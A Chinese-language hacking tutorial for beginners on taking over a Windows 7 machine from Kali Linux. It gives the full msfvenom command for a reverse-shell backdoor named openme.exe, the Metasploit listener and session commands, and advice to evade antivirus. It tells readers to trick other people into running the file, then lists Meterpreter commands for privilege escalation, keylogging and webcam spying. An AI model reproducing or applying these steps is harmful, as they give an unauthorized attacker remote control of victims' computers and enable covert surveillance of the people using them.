kali linux 渗透技术教程

这是一个简单渗透技术教程，适合对黑客技术感兴趣的新手，通过这个教程你可以渗透网路中win7系统主机。不多说，直接进入主题。

渗透攻陷win7系统，最新教程

工具/原料

kali Linux系统（IP:10.10.10.128）（或者者BT5）

win7系统 （IP:10.10.10.129）

方法/步骤

首先在kali上制作一个后门程序。文件名为：openme.exe

命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe

#本地监听地址及端口号：10.10.10.128：50000

渗透攻陷win7系统，最新教程

渗透攻陷win7系统，最新教程

为生成的文件 openme.exe 赋予可执行的权限，假如有必要可以对该文件执行免杀

命令：

chmod 777 openme.exe

渗透攻陷win7系统，最新教程

渗透攻陷win7系统，最新教程

打开msf，加载exploit/multi/handler板块，同时设置本地主机地址，本地端口

命令：

msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 10.10.10.128

msf exploit(handler) > set lport 50000

渗透攻陷win7系统，最新教程

开始执行渗透攻击并监听

命令：

msf exploit(handler) > exploit -z -j

渗透攻陷win7系统，最新教程

此时，你可以将文件发给其余人，利使用社会工程学知识让别人在他的win7系统上打开该文件，那么你的目的就达到了

下面就是我在win7虚拟机中的文件，而后运行该文件

渗透攻陷win7系统，最新教程

后门程序反向连接到msf，msf发起第二次攻击（开始渗透），而后用户端（后门程序）连接到服务端（msf）。

你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell，还有session信息。

命令：

msf exploit(handler) > sessions

msf exploit(handler) > sessions -i 1

meterpreter > shell

渗透攻陷win7系统，最新教程

渗透攻陷win7系统，最新教程

渗透攻陷win7系统，最新教程

最后恭喜你就这样hacked别人的win7系统，假如你进一步学习Windows系统下的命令行操作，你即可以随便控制别人的主机了。

下面附上meterpreter常使用的命令

getsystem #会自动利使用各种各样的系统漏洞来进行权限提升

migrate #进程id进程迁移

background #把当前的会话设置为背景，需要的时候在启使用

getuid #查看对方正在运行的使用户

ps #列出所有的进程

getpid #返回运行meterpreter的id号

sysinfo #产看系统信息和体系结构

shell #切换到cmd的系统权限方式

exit #退出shell会话返回meterpreter或者终止meterpreter

getdesktop截取目标主机当前桌面会话窗口

run webcam -p /var/www #在/var/www目录监控目标主机的摄像头

keylog_recorder #用migrate将会话迁移至explorer.exe的进程空间后记录键盘

————————————————————–

视频教程：

http://www.365yg.com/i6577712524903318029/#mid=88381919053

————————————————————